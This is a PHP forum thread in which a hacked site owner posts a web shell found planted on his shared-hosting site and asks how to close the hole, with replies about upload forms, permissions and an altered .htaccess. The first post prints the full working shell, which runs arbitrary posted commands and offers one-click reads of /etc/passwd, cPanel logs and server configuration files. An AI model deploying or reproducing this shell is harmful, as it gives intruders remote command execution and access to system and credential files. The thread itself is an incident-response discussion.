Jump to content

Strange php code found on my website

newbtophp

By newbtophp
in PHP Coding Help

 Share

Recommended Posts

newbtophp Advanced Member

newbtophp

Posted
Posted

I got hacked and the following code was placed within my files:

 

<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b><br>";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
echo "<b><font color=red>Server</font></b>:$server<br>";
echo "<b><font color=red>Komut Sonu?lar?:</font></b><br>";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>

 

How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?

 

Link to comment
Share on other sites
newbtophp Advanced Member

newbtophp

Posted
  • Author
Posted

It looks like:

 

http://securityvulns.com/news/PHP/htacces/safemodebypas.html

 

http://jolmos.blogspot.com/2008/02/php-safemode-bypass-cve-2007-3378.html

 

EDIT: After googling i found, a site suggesting a solution:

 

"Disable the error_log function via the disable_functions directive if the safe mode protection is required. This may impact functionality. All software vendors (including open source developers) should audit their source.

via Secunia"

 

http://blog.taragana.com/index.php/archive/php-safe-mode-bypass-weakness-uncovered-in-error_log/

 

But not sure?  :-\

Link to comment
Share on other sites
mrMarcus Member

mrMarcus

Posted
Posted

you said this chunk of code was placed within your files, correct?  now, were these files that had been uploaded to your server lately, or how did these files get to your server?

 

it's either an insecure connection via FTP or another uploading process, or your files might be writeable on the server.

 

check the CHMOD of your folders/files and change your passwords on your account.

 

i'm trying to help .. i've seen this before .. therefore, a comment like this:

 

No I wouldnt upload a shell to my site, why would i want to exploit my site?

 

won't get you help, since i'm quite sure you don't want to exploit your own site .. think, "how can i offer more insight into MY issue at hand", rather than making quips.

 

patching it is one thing, but actually resolving the reason this was injected in the first place is what is really important.

Link to comment
Share on other sites
newbtophp Advanced Member

newbtophp

Posted
  • Author
Posted

you said this chunk of code was placed within your files, correct?  now, were these files that had been uploaded to your server lately, or how did these files get to your server?

 

it's either an insecure connection via FTP or another uploading process, or your files might be writeable on the server.

 

check the CHMOD of your folders/files and change your passwords on your account.

 

i'm trying to help .. i've seen this before .. therefore, a comment like this:

 

No I wouldnt upload a shell to my site, why would i want to exploit my site?

 

won't get you help, since i'm quite sure you don't want to exploit your own site .. think, "how can i offer more insight into MY issue at hand", rather than making quips.

 

patching it is one thing, but actually resolving the reason this was injected in the first place is what is really important.

 

Sorry, im just panicking. I've reset my cp pass, and also cleared my site and reinstalled a fresh backup.

 

I found the code within a file named liz0.php (i've never seen this file before, and never uploaded it) within a subdirectory which also contains an error_log and a file named c99.txt. (i tried posting that file here, but my antivirus wont allow it)

 

After some research (see my above post), I've realised the hacker/s got access to my site by a php safemode bypass vulnerability.

 

Im on shared hosting and this is the properties:

 

Apache version 1.3.41 (Unix)

PHP version 5.2.9

Operating system Linux

 

Link to comment
Share on other sites
PFMaBiSmAd Advanced Member

PFMaBiSmAd

Posted
Posted
the following code was placed within my files

I found the code within a file named liz0.php (i've never seen this file before, and never uploaded it)
Then the file where you found that code is not YOUR (my) file, it is a file that is not one of yours. Providing relevant information like you just posted saves a lot of time in finding the actual problem and you should have included it in your first post.

 

That file did not necessarily get were it is because of a safe mode problem. Is the safe_mode setting even ON? What does a phpinfo() statement show for safe_mode?

 

The links you found and posted above probably don't even apply. Is there anything in a .htaccess file that you did not put in it and is your code even using the php error_log function in it?

 

It is more likely that you have an upload feature on your site and that your upload form processing code is allowing an uploaded file to be put anywhere that php has access to and/or you actually have another .php file somewhere that was uploaded and it was used to put the file you did find to be put where you found it.

Link to comment
Share on other sites
newbtophp Advanced Member

newbtophp

Posted
  • Author
Posted

I do have an upload form, but that dont store any files, it just use php tmp (temporary) directory and unlink() function.

 

In my .htaccess theirs the following code:

 

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

 

I dont remember puting that in their, my .htaccess was empty, so this had to the cause of that.

 

Link to comment
Share on other sites
This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.